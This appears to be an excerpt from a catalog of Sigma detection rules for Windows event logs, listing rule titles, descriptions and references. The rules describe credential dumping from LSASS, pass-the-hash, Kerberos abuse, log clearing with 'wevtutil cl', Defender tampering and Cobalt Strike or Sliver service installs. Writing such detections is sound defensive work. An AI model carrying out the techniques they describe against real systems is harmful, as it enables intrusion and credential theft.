Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as a covering detection for the exclusion of Logon Type 3 from ANONYMOUS LOGON accounts. |
https://twitter.com/SBousseaden/status/1189469425482829824 |
Password Dumper Activity on LSASS |
Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN |
https://twitter.com/jackcr/status/807385668833968128 |
Suspicious Remote Logon with Explicit Credentials |
Detects suspicious processes logging on with explicit credentials |
https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view |
Potentially Suspicious AccessMask Requested From LSASS |
Detects process handle on LSASS process with certain access mask |
https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
Reconnaissance Activity |
Detects activity as "net user administrator /domain" and "net group domain admins /domain" |
https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html |
Password Protected ZIP File Opened |
Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened. |
https://twitter.com/sbousseaden/status/1523383197513379841 |
Password Protected ZIP File Opened (Suspicious Filenames) |
Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened. |
https://twitter.com/sbousseaden/status/1523383197513379841 |
Password Protected ZIP File Opened (Email Attachment) |
Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened. |
https://twitter.com/sbousseaden/status/1523383197513379841 |
Uncommon Outbound Kerberos Connection - Security |
Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
|
https://github.com/GhostPack/Rubeus |
Possible Shadow Credentials Added |
Detects possible addition of shadow credentials to an active directory object. |
https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html, https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/, https://twitter.com/SBousseaden/status/1581300963650187264? |
Suspicious PsExec Execution |
Detects execution of PsExec or PAExec with a renamed service name. This rule helps to filter out the noise if PsExec is used for legitimate purposes or if an attacker uses a PsExec client other than the Sysinternals one. |
https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html |
Suspicious Access to Sensitive File Extensions |
Detects known sensitive file extensions accessed on a network share |
Internal Research |
Suspicious Kerberos RC4 Ticket Encryption |
Detects service ticket requests using RC4 encryption type |
https://adsecurity.org/?p=3458, https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity |
Suspicious Scheduled Task Creation |
Detects suspicious scheduled task creation events, based on attributes such as paths, command line flags, etc. |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4698 |
Important Scheduled Task Deleted/Disabled |
Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4699, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4701 |
Suspicious Scheduled Task Update |
Detects scheduled task update events that contain suspicious keywords. |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4698 |
Unauthorized System Time Modification |
Detect scenarios where a potentially unauthorized application or user is modifying the system time. |
Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well), Live environment caused by malware, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4616 |
Remote Service Activity via SVCCTL Named Pipe |
Detects remote service activity via remote access to the svcctl named pipe |
https://web.archive.org/web/20230329155141/https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html |
SysKey Registry Keys Access |
Detects handle requests and access operations to specific registry keys to calculate the SysKey |
https://threathunterplaybook.com/hunts/windows/190625-RegKeyAccessSyskey/notebook.html |
Sysmon Channel Reference Deletion |
Potential threat actor tampering with Sysmon manifest and eventually disabling it |
https://twitter.com/Flangvik/status/1283054508084473861, https://twitter.com/SecurityJosh/status/1283027365770276866, https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html, https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8 |
Tap Driver Installation - Security |
Detects the installation of a well-known TAP driver service. This could be a sign of potential preparation for data exfiltration using tunnelling techniques.
|
https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers |
Suspicious Teams Application Related ObjectAcess Event |
Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. |
https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/, https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens |
Transferring Files with Credential Data via Network Shares |
Transferring files with well-known filenames (sensitive files with credential data) using network shares |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
User Added to Local Administrator Group |
Detects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4732, https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers |
User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess' |
The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA. |
https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1 |
Local User Creation |
Detects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs.
|
https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/ |
Potential Privileged System Service Operation - SeLoadDriverPrivilege |
Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.
With this privilege, the user can dynamically load and unload device drivers or other code into kernel mode.
This user right does not apply to Plug and Play device drivers.
If you exclude privileged users/admins and processes which are allowed to do so, you may be left with bad programs trying to load malicious kernel drivers.
This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools, so you have to work with a whitelist to find the bad stuff.
|
https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4673 |
User Logoff Event |
Detects a user log-off activity. Could be used for example to correlate information during forensic investigations |
https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4634, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4647 |
VSSAudit Security Event Source Registration |
Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy |
Windows Defender Exclusion List Modified |
Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.
|
https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/ |
Windows Defender Exclusion Deleted |
Detects when a Windows Defender exclusion has been deleted. This could indicate an attacker trying to cover their tracks by removing the added exclusions.
|
https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/ |
T1047 Wmiprvse Wbemcomn DLL Hijack |
Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network for a WMI DLL Hijack scenario. |
https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html |
Locked Workstation |
Detects locked workstation session events that occur automatically after a standard period of inactivity. |
https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800 |
WMI Persistence - Security |
Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs. |
https://twitter.com/mattifestation/status/899646620148539397, https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/ |
Windows Defender Exclusion Registry Key - Write Access Requested |
Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security.
|
https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/ |
Admin User Remote Logon |
Detect remote login by Administrator user (depending on internal pattern). |
https://car.mitre.org/wiki/CAR-2016-04-005 |
DiagTrackEoP Default Login Username |
Detects the default "UserName" used by the DiagTrackEoP POC |
https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46 |
A Member Was Removed From a Security-Enabled Global Group |
Detects activity when a member is removed from a security-enabled global group |
https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633 |
Potential Access Token Abuse |
Detects potential token impersonation and theft, for example when using "DuplicateToken(Ex)" and "ImpersonateLoggedOnUser" with the "LOGON32_LOGON_NEW_CREDENTIALS" flag. |
https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation, https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html |
RDP Login from Localhost |
RDP login with a localhost source address may be a tunnelled login |
https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html |
Successful Overpass the Hash Attempt |
Detects successful logon with logon type 9 (NewCredentials), which matches the Overpass the Hash behavior of e.g. Mimikatz's sekurlsa::pth module. |
https://web.archive.org/web/20220419045003/https://cyberwardog.blogspot.com/2017/04/chronicles-of-threat-hunter-hunting-for.html |
Scanner PoC for CVE-2019-0708 RDP RCE Vuln |
Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep |
https://twitter.com/AdamTheAnalyst/status/1134394070045003776, https://web.archive.org/web/20190710034152/https://github.com/zerosum0x0/CVE-2019-0708 |
A Member Was Added to a Security-Enabled Global Group |
Detects activity when a member is added to a security-enabled global group |
https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632 |
A Security-Enabled Global Group Was Deleted |
Detects activity when a security-enabled global group is deleted |
https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634 |
External Remote RDP Logon from Public IP |
Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port. |
https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html, https://twitter.com/Purp1eW0lf/status/1616144561965002752 |
Pass the Hash Activity 2 |
Detects the pass-the-hash attack technique, which is used to move laterally inside the network |
https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events, https://web.archive.org/web/20170909091934/https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis, https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/ |
External Remote SMB Logon from Public IP |
Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port. |
https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html, https://twitter.com/Purp1eW0lf/status/1616144561965002752 |
Failed Logon From Public IP |
Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary. |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4625 |
Potential Privilege Escalation via Local Kerberos Relay over LDAP |
Detects a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, and the target user SID is the built-in local Administrator account.
This may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined limited user to local System privileges.
|
https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g, https://github.com/elastic/detection-rules/blob/5fe7833312031a4787e07893e27e4ea7a7665745/rules/_deprecated/privilege_escalation_krbrelayup_suspicious_logon.toml#L38 |
Outgoing Logon with New Credentials |
Detects logon events that specify new credentials |
https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf |
RottenPotato Like Attack Pattern |
Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like |
https://twitter.com/SBousseaden/status/1195284233729777665 |
Successful Account Login Via WMI |
Detects successful logon attempts performed with WMI |
Internal Research |
Windows Filtering Platform Blocked Connection From EDR Agent Binary |
Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents.
Adversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) agents from reporting security events.
|
https://github.com/netero1010/EDRSilencer, https://github.com/amjcyber/EDRNoiseMaker, https://ghoulsec.medium.com/misc-series-4-forensics-on-edrsilencer-events-428b20b3f983 |
Microsoft Defender Blocked from Loading Unsigned DLL |
Detects the Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs, which may be an attempt to sideload an arbitrary DLL |
https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool |
Unsigned Binary Loaded From Suspicious Location |
Detects the Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations |
https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv |
HybridConnectionManager Service Running |
Rule to detect the Hybrid Connection Manager service running on an endpoint. |
https://twitter.com/Cyb3rWard0g/status/1381642789369286662 |
Suspicious Application Installed |
Detects a suspicious application installation by looking at the shortcut added to the app resolver cache |
https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3 |
Suspicious Rejected SMB Guest Logon From IP |
Detects an attempted PrintNightmare (CVE-2021-1675) remote code execution in the Windows Spooler Service |
https://twitter.com/KevTheHermit/status/1410203844064301056, https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/, https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare |
Sysmon Application Crashed |
Detects application popup reporting a failure of the Sysmon service |
https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1803/W10_1803_Pro_19700101_17134.1/WEPExplorer/Application%20Popup.xml#L36 |
NTLMv1 Logon Between Client and Server |
Detects the reporting of NTLMv1 being used between a client and server. NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware. |
https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/22H2/W10_22H2_Pro_20230321_19045.2728/WEPExplorer/LsaSrv.xml |
Active Directory Certificate Services Denied Certificate Enrollment Request |
Detects denied requests by Active Directory Certificate Services.
Examples of such request denials include issues with permissions on the certificate template or invalid signatures.
|
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd299871(v=ws.10), https://www.gradenegger.eu/en/details-of-the-event-with-id-53-of-the-source-microsoft-windows-certificationauthority/ |
DHCP Server Error Failed Loading the CallOut DLL |
This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded |
https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html, https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx, https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx |
DHCP Server Loaded the CallOut DLL |
This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded |
https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html, https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx, https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx |
Potential CVE-2021-42287 Exploitation Attempt |
The attacker creates a computer object using those permissions with a password known to her.
After that she clears the attribute ServicePrincipalName on the computer object.
Because she created the object (CREATOR OWNER), she is granted additional permissions and can make many changes to the object.
|
https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/ |
Local Privilege Escalation Indicator TabTip |
Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode |
https://github.com/antonioCoco/JuicyPotatoNG |
Eventlog Cleared |
Detects that one of the Windows Eventlogs has been cleared, e.g. caused by "wevtutil cl" command execution |
https://twitter.com/deviouspolack/status/832535435960209408, https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 |
Important Windows Eventlog Cleared |
Detects the clearing of one of the Windows Core Eventlogs, e.g. caused by "wevtutil cl" command execution |
https://twitter.com/deviouspolack/status/832535435960209408, https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 |
KDC RC4-HMAC Downgrade CVE-2022-37966 |
Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation |
https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d |
Certificate Use With No Strong Mapping |
Detects a user certificate that was valid but could not be mapped to a user in a strong way (such as via explicit mapping, key trust mapping, or a SID)
This could be a sign of exploitation of the elevation of privilege vulnerabilities (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows certificate spoofing by not requiring a strong mapping.
Events where the AccountName and CN of the Subject do not match, or where the CN ends in a dollar sign indicating a machine, may indicate certificate spoofing.
|
https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16 |
No Suitable Encryption Key Found For Generating Kerberos Ticket |
Detects errors when a target server doesn't have suitable keys for generating Kerberos tickets.
This issue can occur, for example, when a service uses a user account or a computer account that is configured for DES encryption only, on a computer running Windows 7 where DES encryption for Kerberos authentication is disabled.
|
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd348773(v=ws.10), https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/kdc-event-16-27-des-encryption-disabled |
Critical Hive In Suspicious Location Access Bits Cleared |
Detects events from the Kernel-General ETW provider indicating that the access bits of a hive with a system-like hive name located in the temp directory have been reset.
This occurs when an application tries to access a hive that has not been recognized within the last 7 days (by default).
Registry hive dumping utilities such as QuarksPwDump were seen emitting this behavior.
|
https://github.com/nasbench/Misc-Research/blob/b20da2336de0f342d31ef4794959d28c8d3ba5ba/ETW/Microsoft-Windows-Kernel-General.md |
Volume Shadow Copy Mount |
Detects volume shadow copy mount via Windows event log |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy |
Suspicious Usage of CVE_2021_34484 or CVE 2022_21919 |
During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (there may be many false positives with this event) are created. Moreover, it appears that the directory \Users\TEMP may be created during the exploitation. Observed on Server 2008 |
https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html |
Windows Update Error |
Detects Windows update errors including installation failures and connection issues. Defenders should observe this in case critical update KBs aren't installed.
|
https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1903/W10_1903_Pro_20200714_18362.959/WEPExplorer/Microsoft-Windows-WindowsUpdateClient.xml |
Zerologon Exploitation Using Well-known Tools |
This rule is designed to detect attempts to exploit the Zerologon (CVE-2020-1472) vulnerability using the mimikatz zerologon module or other exploits from a machine with the "kali" hostname. |
https://www.secura.com/blog/zero-logon, https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382 |
Vulnerable Netlogon Secure Channel Connection Allowed |
Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472. |
https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc |
NTFS Vulnerability Exploitation |
Detects the exploitation of an NTFS vulnerability that was reported, without many details, via Twitter |
https://twitter.com/jonasLyk/status/1347900440000811010, https://twitter.com/wdormann/status/1347958161609809921, https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/ |
Windows Defender Threat Detection Service Disabled |
Detects when the "Windows Defender Threat Protection" service is disabled. |
https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md |
CobaltStrike Service Installations - System |
Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement |
https://www.sans.org/webcasts/119395, https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/, https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ |
smbexec.py Service Installation |
Detects the use of smbexec.py tool by detecting a specific service installation |
https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/, https://github.com/fortra/impacket/blob/33058eb2fde6976ea62e04bc7d6b629d64d44712/examples/smbexec.py#L286-L296, https://github.com/fortra/impacket/blob/edef71f17bc1240f9f8c957bbda98662951ac3ec/examples/smbexec.py#L60 |
Invoke-Obfuscation CLIP+ Launcher - System |
Detects Obfuscated use of Clip.exe to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Obfuscated IEX Invocation - System |
Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references |
https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 |
Invoke-Obfuscation STDIN+ Launcher - System |
Detects Obfuscated use of stdin to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR+ Launcher - System |
Detects Obfuscated use of Environment Variables to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation COMPRESS OBFUSCATION - System |
Detects Obfuscated Powershell via COMPRESS OBFUSCATION |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Stdin - System |
Detects Obfuscated Powershell via Stdin in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation RUNDLL LAUNCHER - System |
Detects Obfuscated Powershell via RUNDLL LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Clip - System |
Detects Obfuscated Powershell via use Clip.exe in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use MSHTA - System |
Detects Obfuscated Powershell via use MSHTA in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Rundll32 - System |
Detects Obfuscated Powershell via use Rundll32 in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System |
Detects Obfuscated Powershell via VAR++ LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
KrbRelayUp Service Installation |
Detects service creation from KrbRelayUp tool used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings) |
https://github.com/Dec0ne/KrbRelayUp |
Credential Dumping Tools Service Execution - System |
Detects well-known credential dumping tools execution via service execution events |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
Meterpreter or Cobalt Strike Getsystem Service Installation - System |
Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation |
https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ |
Moriya Rootkit - System |
Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report |
https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831 |
PowerShell Scripts Installed as Services |
Detects a PowerShell script installed as a service |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
Anydesk Remote Access Software Service Installation |
Detects the installation of the AnyDesk software service, which could be an indication of AnyDesk abuse if the software isn't already in use in your environment. |
https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/ |
CSExec Service Installation |
Detects CSExec service installation and execution events |
https://github.com/malcomvetter/CSExec |
HackTool Service Registration or Execution |
Detects the installation or execution of services associated with hack tools |
Internal Research |
Mesh Agent Service Installation |
Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers |
https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ |
NetSupport Manager Service Install |
Detects NetSupport Manager service installation on the target system. |
http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf |
PAExec Service Installation |
Detects PAExec service installation |
https://www.poweradmin.com/paexec/ |
New PDQDeploy Service - Server Side |
Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.
PDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines
|
https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm |
New PDQDeploy Service - Client Side |
Detects PDQDeploy service installation on the target system.
When a package is deployed via PDQDeploy it installs a remote service on the target machine with the name "PDQDeployRunner-X" where "X" is an integer starting from 1
|
https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm |
ProcessHacker Privilege Elevation |
Detects a ProcessHacker tool that elevated privileges to a very high level |
https://twitter.com/1kwpeter/status/1397816101455765504 |
RemCom Service Installation |
Detects RemCom service installation and execution events |
https://github.com/kavika13/RemCom/ |
Remote Access Tool Services Have Been Installed - System |
Detects service installations of various remote access tool software. Such software is often abused by threat actors to perform |
https://redcanary.com/blog/misbehaving-rats/ |
Remote Utilities Host Service Install |
Detects Remote Utilities Host service installation on the target system. |
https://www.remoteutilities.com/support/kb/host-service-won-t-start/ |
Sliver C2 Default Service Installation |
Detects known malicious service installations that appear in cases in which Sliver implants execute the PsExec command |
https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231, https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/ |
Service Installed By Unusual Client - System |
Detects a service installed by a client which has PID 0 or whose parent has PID 0 |
https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html |
Suspicious Service Installation |
Detects suspicious service installation commands |
Internal Research |
PsExec Service Installation |
Detects PsExec service installation and execution events |
https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet |
Tap Driver Installation |
Detects well-known TAP software installation, a possible preparation for data exfiltration using tunnelling techniques |
https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers |
TacticalRMM Service Installation |
Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool. |
https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ |
Uncommon Service Installation Image Path |
Detects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc.
|
Internal Research |
Important Windows Service Terminated With Error |
Detects important or interesting Windows services that got terminated for whatever reason |
https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/ |
Windows Service Terminated With Error |
Detects Windows services that got terminated for whatever reason |
https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/ |
Important Windows Service Terminated Unexpectedly |
Detects important or interesting Windows services that got terminated unexpectedly. |
https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/ |
RTCore Suspicious Service Installation |
Detects the installation of the RTCore service, which could be an indication of abuse of the vulnerable Micro-Star MSI Afterburner driver |
